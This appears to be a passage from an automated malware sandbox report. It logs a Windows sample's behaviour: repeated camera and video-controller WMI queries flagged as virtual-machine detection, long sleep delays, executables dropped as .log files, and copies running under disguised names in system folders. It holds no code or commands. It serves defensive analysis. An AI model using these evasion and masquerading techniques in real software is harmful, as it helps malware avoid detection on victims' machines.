                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeMemory allocated: 1A720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 23C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1A3C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 10D0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1ABD0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1350000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1AEF0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: FD0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1A8C0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 2C10000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1AC10000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1470000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1AFF0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 11D0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1B0A0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: FD0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 970000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 30E0000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeMemory allocated: 1B0E0000 memory reserve | memory write watch
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1060000 memory reserve | memory write watch
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 680000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1A2F0000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: A70000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1A5C0000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 740000 memory reserve | memory write watch
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeMemory allocated: 1A540000 memory reserve | memory write watch
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 16_2_00007FFD9B9414D0 rdtsc 16_2_00007FFD9B9414D0
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 3600000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597530Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597406Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596836Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596532Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 596028Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595672Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595522Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594285Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 594171Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593954Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593732Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593583Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 593349Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592866Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592698Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592506Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 592166Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591905Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591779Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591664Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591562Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591453Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591269Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591156Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 591046Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590937Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590823Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590718Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590597Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590459Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590343Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590209Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 590093Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589984Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 589841Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWindow / User API: threadDelayed 4066Jump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWindow / User API: threadDelayed 5633Jump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\NPGqEfku.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\RbOZahUq.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\tWJuefum.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\rAXMkKSS.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\SYphwgjk.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\lyXnXruh.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\uUlCzfJh.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\rMnteNPl.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\MgNITBew.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\WPgYDdje.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\HkLrMVoC.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\UAeHorhP.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\wySLBGmi.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\hdUdukKE.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\dVPxoyeA.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\ADqcsYvZ.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\MoHhbGed.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\quZEfXkb.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\CNYkWNAB.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\wNAllcuf.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\YALoKruW.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\HtvJqEPI.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\oPsvdwHZ.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\hREwAhMk.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\OquQxqjY.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\eJTFZLay.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\CFoRreZv.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\GmHIOoGs.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\bCyXfazS.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\xbtTyUdE.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\DldKqVbv.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\fxzonGoL.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\yKbtGcJa.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\KInsUcJl.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\PFcqhLrW.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZeYGhBeG.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeDropped PE file which has not been started: C:\Users\user\Desktop\klRmPCEz.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeDropped PE file which has not been started: C:\Users\user\Desktop\qmplAoJV.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 2256Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598985s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7572Thread sleep time: -14400000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597688s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597530s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597406s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7572Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -597078s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596953s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596836s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596532s >= -30000sJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exe TID: 7588Thread sleep time: -596391s >= -30000sJump to behavior
